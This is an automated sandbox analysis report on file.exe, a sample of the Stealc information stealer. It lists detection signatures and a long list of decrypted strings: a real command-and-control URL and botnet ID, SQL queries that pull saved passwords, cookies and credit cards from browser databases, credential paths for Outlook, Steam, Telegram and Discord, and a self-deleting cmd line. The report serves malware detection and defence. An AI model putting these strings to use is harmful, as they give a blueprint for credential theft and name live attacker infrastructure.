Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546042
MD5: 3d17618b1108053c2643a92804657456
SHA1: 92d6f817db761936dbe341a58edcfbdb3f778de7
SHA256: 06485350aa2fecbc8b68c4bf5e2e507030065fd92794425da145c74b6804c41c
Tags: exeuser-Bitsight
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Found malware configuration
Source: 0.2.file.exe.7b0000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 47%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: 30
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: 11
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: 20
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: 24
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetProcAddress
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: lstrcatA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: OpenEventA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CreateEventA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CloseHandle
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Sleep
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: VirtualFree
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: VirtualAlloc
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: HeapAlloc
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: lstrcpyA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: lstrlenA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: ExitProcess
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetSystemTime
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: advapi32.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: gdi32.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: user32.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: crypt32.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: ntdll.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetUserNameA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CreateDCA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: ReleaseDC
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: sscanf
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: VMwareVMware
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: HAL9TH
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: JohnDoe
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: DISPLAY
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: http://185.215.113.206
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: bksvnsj
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: /6c4adf523b719729.php
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: /746f34465cf17784/
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: tale
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GlobalLock
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: HeapFree
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetFileSize
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GlobalSize
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: IsWow64Process
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Process32Next
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetLocalTime
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: FreeLibrary
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Process32First
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: DeleteFileA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: FindNextFileA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: LocalFree
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: FindClose
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: LocalAlloc
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: ReadFile
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: SetFilePointer
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: WriteFile
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CreateFileA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CopyFileA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: VirtualProtect
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetLastError
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: lstrcpynA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GlobalFree
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: OpenProcess
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: TerminateProcess
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: ole32.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: wininet.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: shell32.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: psapi.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: SelectObject
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: BitBlt
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: DeleteObject
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GdiplusStartup
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GdiplusShutdown
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GdipDisposeImage
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GdipFree
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CoUninitialize
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CoInitialize
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CoCreateInstance
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: BCryptDecrypt
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: BCryptSetProperty
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetWindowRect
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetDesktopWindow
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetDC
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CloseWindow
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: wsprintfA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CharToOemW
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: wsprintfW
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: RegQueryValueExA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: RegCloseKey
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: RegEnumValueA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CryptUnprotectData
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: ShellExecuteExA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: InternetConnectA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: InternetCloseHandle
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: InternetOpenA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: HttpSendRequestA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: InternetReadFile
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: StrCmpCA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: StrStrA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: StrCmpCW
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: PathMatchSpecA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: RmStartSession
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: RmRegisterResources
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: RmGetList
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: RmEndSession
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: sqlite3_open
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: sqlite3_step
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: sqlite3_column_text
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: sqlite3_finalize
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: sqlite3_close
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: encrypted_key
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: PATH
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: NSS_Init
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: NSS_Shutdown
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: PK11_Authenticate
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: C:\ProgramData\
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: browser:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: profile:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: url:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: login:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: password:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Opera
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: OperaGX
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Network
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: cookies
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: .txt
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: TRUE
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: FALSE
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: autofill
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: history
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: cc
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: name:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: month:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: year:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: card:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Cookies
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Login Data
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Web Data
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: History
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: logins.json
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: formSubmitURL
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: usernameField
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: encryptedUsername
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: encryptedPassword
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: guid
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: cookies.sqlite
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: formhistory.sqlite
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: places.sqlite
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: plugins
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Local Extension Settings
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Sync Extension Settings
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: IndexedDB
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Opera Stable
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Opera GX Stable
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: CURRENT
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: chrome-extension_
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Local State
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: profiles.ini
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: chrome
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: opera
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: firefox
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: wallets
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: ProductName
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: x32
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: x64
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: ProcessorNameString
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: DisplayName
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: DisplayVersion
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Network Info:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - IP: IP?
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - Country: ISO?
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: System Summary:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - HWID:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - OS:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - Architecture:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - UserName:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - Computer Name:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - Local Time:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - UTC:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - Language:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - Keyboards:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - Laptop:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - Running Path:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - CPU:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - Threads:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - Cores:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - RAM:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - Display Resolution:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: - GPU:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: User Agents:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Installed Apps:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: All Users:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Current User:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Process List:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: system_info.txt
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: freebl3.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: mozglue.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: msvcp140.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: nss3.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: softokn3.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: vcruntime140.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: \Temp\
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: .exe
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: runas
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: open
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: /c start
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: %DESKTOP%
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: %APPDATA%
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: %USERPROFILE%
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: %PROGRAMFILES%
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: %RECENT%
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: *.lnk
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: files
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: \discord\
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: key_datas
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: map*
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Telegram
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Tox
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: *.tox
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: *.ini
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Password
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: 00000001
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: 00000002
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: 00000003
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: 00000004
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Pidgin
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: \.purple\
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: accounts.xml
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: token:
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: SteamPath
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: \config\
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: ssfn*
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: config.vdf
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: loginusers.vdf
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: \Steam\
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: sqlite3.dll
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: browsers
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: done
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: soft
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: https
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: POST
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: HTTP/1.1
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.7b0000.0.unpack String decryptor: hwid
